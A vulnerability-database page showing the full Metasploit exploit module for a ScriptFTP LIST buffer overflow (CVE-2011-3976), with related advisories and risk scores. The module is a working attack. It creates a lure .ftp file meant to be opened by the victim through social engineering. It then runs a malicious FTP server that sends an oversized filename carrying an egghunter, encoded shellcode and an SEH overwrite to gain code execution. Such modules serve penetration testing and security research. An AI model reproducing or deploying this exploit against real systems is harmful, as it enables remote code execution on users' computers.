Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ScriptFTP LIST Remote Buffer Overflow

🗓️ 09 Oct 2011 04:17:03Reported by modpr0be, TecR0c <[email protected]>, mr_me <[email protected]>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 27 Views

ScriptFTP remote buffer overflow vulnerability in LIST comman

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2011-3976
20 Sep 201100:00
circl
CVE		CVE-2011-3976
4 Oct 201110:00
cve
Cvelist		CVE-2011-3976
4 Oct 201110:00
cvelist
NVD		CVE-2011-3976
4 Oct 201110:55
nvd
OpenVAS		ScriptFTP 'GETLIST' or 'GETFILE' Commands Remote Buffer Overflow Vulnerability
23 Sep 201100:00
openvas
OpenVAS		ScriptFTP 'GETLIST' or 'GETFILE' Commands Remote Buffer Overflow Vulnerability
23 Sep 201100:00
openvas
Packet Storm		ScriptFTP 3.3 Remote Buffer Overflow
10 Oct 201100:00
packetstorm
Packet Storm		Attachmate Reflection FTP Client Heap Overflow
16 Nov 201100:00
packetstorm
Prion		Stack overflow
4 Oct 201110:55
prion
Positive Technologies		PT-2011-4788 · Ammsoft · Scriptftp
4 Oct 201100:00
ptsecurity
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::FtpServer
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Egghunter

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ScriptFTP LIST Remote Buffer Overflow',
      'Description'    => %q{
        AmmSoft's ScriptFTP client is susceptible to a remote buffer overflow
        vulnerability that is triggered when processing a sufficiently long
        filename during a FTP LIST command resulting in overwriting the
        exception handler. Social engineering of executing a specially crafted
        ftp file by double click will result in connecting to our malicious
        server and perform arbitrary code execution which allows the attacker to
        gain the same rights as the user running ScriptFTP. This vulnerability
        affects versions 3.3 and earlier.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'modpr0be', #Vulnerability discovery and original exploit
          'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module
          'mr_me <steventhomasseeley[at]gmail.com>',  # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2011-3976' ],
          [ 'OSVDB', '75633' ],
          [ 'EDB', '17876' ],
          [ 'US-CERT-VU', '440219' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'DisablePayloadHandler' => false
        },
      'Payload'        =>
        {
          'BadChars'        => "\x00\xff\x0d\x5c\x2f\x0a",
          'EncoderType'     => Msf::Encoder::Type::AlphanumMixed,
          'EncoderOptions'  =>
          {
            'BufferRegister' => 'EDI',  # Egghunter jmp edi
          }
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # CALL DWORD PTR SS:[EBP-4]
          # scriptftp.exe - File version=Build 3/9/2009
          [ 'Windows XP SP3 / Windows Vista', { 'Offset' => 1746, 'Ret' => "\xd6\x41" } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2011-10-12',
      'DefaultTarget'  => 0))

      register_options(
      [
        OptString.new('FILENAME',   [ true, 'The file name.',  'msf.ftp']),
      ])

  end

  def setup
    if datastore['SRVHOST'] == '0.0.0.0'
      lhost = Rex::Socket.source_address('50.50.50.50')
    else
      lhost = datastore['SRVHOST']
    end

    ftp_file = "OPENHOST('#{lhost}','ftp','ftp')\r\n"
    ftp_file << "SETPASSIVE(ENABLED)\r\n"
    ftp_file << "GETLIST($list,REMOTE_FILES)\r\n"
    ftp_file << "CLOSEHOST\r\n"

    print_status("Creating '#{datastore['FILENAME']}'...")
    file_create(ftp_file)
    super
  end


  def on_client_unknown_command(c,cmd,arg)
    c.put("200 OK\r\n")
  end

  def on_client_command_list(c,arg)

    conn = establish_data_connection(c)
    if(not conn)
      c.put("425 Can't build data connection\r\n")
      return
    end

    print_status(" - Data connection set up")
    code = 150
    c.put("#{code} Here comes the directory listing.\r\n")

    code = 226
    c.put("#{code} Directory send ok.\r\n")

    eggoptions =
    {
      :checksum => false,
      :eggtag => 'cure'
    }

    hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)

    # Encode with alphamixed, then unicode mixed
    [ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name|
      enc = framework.encoders.create(name)
      if name =~ /unicode/
        # aligned to ESP & EAX
        enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
      else
        enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' })
      end
      # NOTE: we already eliminated badchars
      hunter = enc.encode(hunter, nil, nil, platform)
      if name =~/alpha/
        #insert getpc_stub & align EDX, unicode encoder friendly.
        #Hardcoded stub is not an issue here because it gets encoded anyway
        getpc_stub = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"
        hunter = getpc_stub + hunter
      end
    }

    unicode_nop = "\x6d" # DD BYTE PTR DS:[ECX],AL

    nseh = "\x61" << unicode_nop
    seh = target.ret

    alignment = "\x54"  # PUSH ESP
    alignment << unicode_nop
    alignment << "\x58"  # POP EAX
    alignment << unicode_nop
    alignment << "\x05\x12\x11"  # ADD EAX,11001200
    alignment << unicode_nop
    alignment << "\x2d\x01\x01"  # SUB EAX,1000100
    alignment << unicode_nop
    alignment << "\x2d\x01\x10"  # SUB EAX,10000100
    alignment << unicode_nop
    alignment << "\x50"  # PUSH EAX
    alignment << unicode_nop
    alignment << "\xc3"  # RETN

    buffer = rand_text_alpha(656)
    buffer << hunter
    buffer << rand_text_alpha(target['Offset']-buffer.length)
    buffer << nseh
    buffer << seh
    buffer << alignment
    buffer << rand_text_alpha(500)
    buffer << egg

    print_status(" - Sending directory list via data connection")
    dirlist =  "-rwxr-xr-x   5 ftpuser  ftpusers       512 Jul 26  2001 #{buffer}.txt\r\n"
    dirlist << "   5 ftpuser  ftpusers       512 Jul 26  2001 A\r\n"
    dirlist << "rwxr-xr-x   5 ftpuser  ftpusers       512 Jul 26  2001 #{buffer}.txt\r\n"

    conn.put(dirlist)
    conn.close
    return
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Oct 2020 20:00Current
8.3High risk
Vulners AI Score8.3
CVSS 26.8
EPSS0.66261
scriptftpremote buffer overflowlist commandvulnerabilityftpsocial engineeringmalicious serverarbitrary code executionattackeruser rightsversion 3.3
27